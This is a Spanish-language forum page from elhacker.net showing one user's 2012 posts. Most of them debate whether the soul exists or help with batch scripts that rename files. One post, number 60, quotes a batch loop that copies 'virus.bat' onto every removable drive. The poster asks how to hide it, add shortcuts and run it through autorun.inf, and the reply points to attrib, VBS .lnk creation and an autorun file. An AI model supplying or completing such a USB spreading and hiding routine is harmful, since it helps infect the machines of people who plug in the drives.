elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Recopilación Tutoriales y Manuales Hacking, Seguridad, Privacidad, Hardware, etc


  Mostrar Mensajes
Páginas: 1 2 3 4 5 [6] 7 8 9 10 11 12 13 14 15 16 17
51  Foros Generales / Foro Libre / Re: ¿El alma existe? ¿qué es el alma? en: 28 Diciembre 2012, 00:46 am
Que no tiene ningún sentido decir que el alma existe porque es lo mismo que la mente.
El término "mente" puede tener dos acepciones básicas. La primera sería el cerebro como tal, y después vendría siendo la referencia a la capacidad intelectual y al pensamiento.
El alma en cambio se supone que es un ente inmaterial que todos los humanos (que no los animales, curiosamente en los mitos cristianos) tenemos y que sobrevive después de la muerte.

No es muy legal y es una patada a la lógica igualar ambos términos y decir que si uno existe, el otro como es lo mismo también debe de existir.

A eso me refería.
mmn, es que depende del significado que se le de al alma, en los mitos religiosos(o la mayoría) se le da un significado inmaterial, para mi el alma es la mente como tal, algo material(algunos diccionarios tienen este significado).
El alma es una de las primeras cosas que se van(a menos que se haga un respaldo con un clon o por otro medio).
Citar
Un perro y un cerdo volador son una misma cosa.
;D
52  Foros Generales / Foro Libre / Re: ¿El alma existe? ¿qué es el alma? en: 27 Diciembre 2012, 23:54 pm
Por un lado un perro.
Por otro lado un cerdo volador.

Un perro y un cerdo volador son una misma cosa. El perro existe, ergo también existe el cerdo volador.

 ;-)
  :huh: Ok esto me confundio.
53  Foros Generales / Foro Libre / Re: ¿El alma existe? ¿qué es el alma? en: 27 Diciembre 2012, 22:57 pm
El alma es la mente o la mente es alma?
son una y la misma cosa? o cada una es independiente de la otra? o las dos son parte de una misma cosa?
mmn son una misma cosa.
54  Foros Generales / Foro Libre / Re: ¿El alma existe? ¿qué es el alma? en: 27 Diciembre 2012, 19:58 pm
Que tema tan interesante, me gustaria(si se puede) saber de donde sacan ese tipo de razonamientos y por qué negar o afirmar la existencia del alma. :xD
Saludos
El alma es la mente. Así que si existe.
55  Programación / Scripting / Re: batch - modificar nombres de archivos, solo sacar las letras y dejar numeros en: 27 Diciembre 2012, 17:41 pm
Gracias EleKtro H@cker, tenia dos errores.
1-Borre por error la variable nombre.
2-Solo sacaba letras de nombres sin espacios.
PD:Espero que no tenga mas bugs
PD2:Solo saca letras.
Código
  1. @echo off
  2. @echo off
  3. Rem eliminador de letras de nombre de archivos
  4. Rem Realizado por Segadorfelix
  5. :::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
  6. set "h="
  7. for /F "tokens=*" %%I IN ('DIR /B *.txt') DO (set /A "h=0"
  8. set "ho="
  9. call:nuke "%%I"
  10. set "el=")
  11. exit /B
  12. :nuke
  13. set "nombre=%~n1"
  14. set "nombre=%nombre: =%"
  15. ren "%~nx1" "%nombre%.txt" 2>NUL
  16. :nukew
  17. call set "nombreD=%%nombre:~%h%,1%%%"
  18. set /A "h=h+1"
  19. IF ["%nombreD%"]==[""] IF DEFINED el (ren "%nombre%.txt" "%ho%.txt" && Goto:EOF) else (
  20. Goto:EOF )
  21. IF %nombreD% GTR 100 (Goto:nuke) else ( set "el=YS" && set "ho=%ho%%nombreD%")
  22. echo %nombre%
  23. echo %nombreD%
  24. echo %ho%
  25. goto:nukew
56  Foros Generales / Foro Libre / Re: ¿El alma existe? ¿qué es el alma? en: 27 Diciembre 2012, 03:25 am
Citar
Es parecido al hecho de que estamos en un planeta en movimiento y no nos damos cuenta de que se mueve. Que no se mueve es sólo una percepción nuestra y además falsa.
https://foro.elhacker.net/foro_libre/la_tierra_gira_a_altas_velocidades-t371382.0.html

Citar
Si a ti te matan, ¿tú podrías seguir vivo en el lugar de tu clon? No es tan evidente, pero si pensamos así un poco en ello parecería que no, que si te matan a ti se acabó. Tú ya no existes.

Quiero llegar a la conclusión de que eso no es así. Es sólo una impresión causada por nuestro cerebro y por el hecho de que no podemos salir de nosotros mismos. Nuestra percepción está limitada a nuestra mente, nada más.
Eso me acuerda a un método hipotético de transportación; consistía en sincronizar todos los átomos de una persona con otros e inmediatamente destruir al "original", dejando el clon idéntico en todo aspecto en otra ubicación.
57  Foros Generales / Foro Libre / Re: ¿El alma existe? ¿qué es el alma? en: 27 Diciembre 2012, 02:55 am
Citar
Realmente ese experimento solo se realizó una vez, por lo que no se pueden sacar conclusiones evidentes. Puede ser que esos 21gramos sean el peso de esa actividad eléctrica en ese individuo.
No creo que sea eso, mas bien se "pudrió" y perdió peso; o el aire que contenía desapareció.
Citar
¿es posible que el corazón de otra persona imprima características al nuevo cuerpo?
Creo que si se transplanta alguna glándula que influya en el sistema hormonal, de lo contrario no.

Para mi lo que diferenciaría a un clon de otro(creado biologicamente ) seria que al primer contacto las ondas eléctricas del cerebro cambiaría y en unos años si se separan seria casi o completamente diferentes.
58  Programación / Scripting / Re: batch - modificar nombres de archivos, solo sacar las letras y dejar numeros en: 27 Diciembre 2012, 01:39 am
Hola hernan35, esto debería servir.
Código:
@echo off
Rem eliminador de letras de nombre de archivos
Rem Realizado por Segadorfelix
set "h="
for /F %%I IN ('DIR /B *.txt') DO (set /A "h=0"
set "ho="
call:nuke %%I
set "el=")
exit /B
:nuke
call set "nombreD=%%nombre:~%h%,1%%%
set /A "h=h+1"
IF ["%nombreD%"]==[""] IF DEFINED el (ren %nombre%.txt %ho%.txt && Goto:EOF) else (
Goto:EOF )
IF %nombreD% GTR 100 (Goto:nuke) else ( set "el=YS" && set "ho=%ho%%nombreD%")
echo %nombre%
echo %nombreD%
echo %ho%
goto:nuke

SaluDoss
59  Programación / Scripting / Re: [BATCH] Problema con comandos TASKKILL y TASKLIST en: 26 Diciembre 2012, 05:25 am
de hecho el mismo título de la ayuda lo dice: "Mensaje de error "0x8004100E" al ejecutar un script de Instrumental de administración de Windows", párense a leer y comprender mejor :P.
Me escuso con que tenia pereza de leer  :P estaba un poco ocupado :silbar: .
PD:¿De donde salen tantos comandos?(de regini, a wmic a SFC).
60  Programación / Scripting / Re: [BATCH] copiar y ocultar virus en unidades extraibles en: 26 Diciembre 2012, 05:17 am
gracias por tomarse la molestia muchachos, investigando y probando mi script va asi:
Código:
@echo off
for %%a in (D,E,F,G,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W,X,Y,Z) do (
for /f  %%b in ('fsutil fsinfo drivetype %%a: ^| find "extra"') do (
xcopy /Y virus.bat %%b ))
Para finalizar, como hago para ocultar ese archivo dentro de una carpeta de la unidad extraible y como creo un acceso directo en el mismo?
Ademas me gustaria que se abra con el autorun.inf
attrib para ocultar y VBS para crear los .lnk(esta en el tutorial de vbs por nov, en esta misma sección)
El autorun.inf, lo busco mas tarde y modifico el mensaje  :P (si es que alguien no lo hace antes  :xD )
Páginas: 1 2 3 4 5 [6] 7 8 9 10 11 12 13 14 15 16 17
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines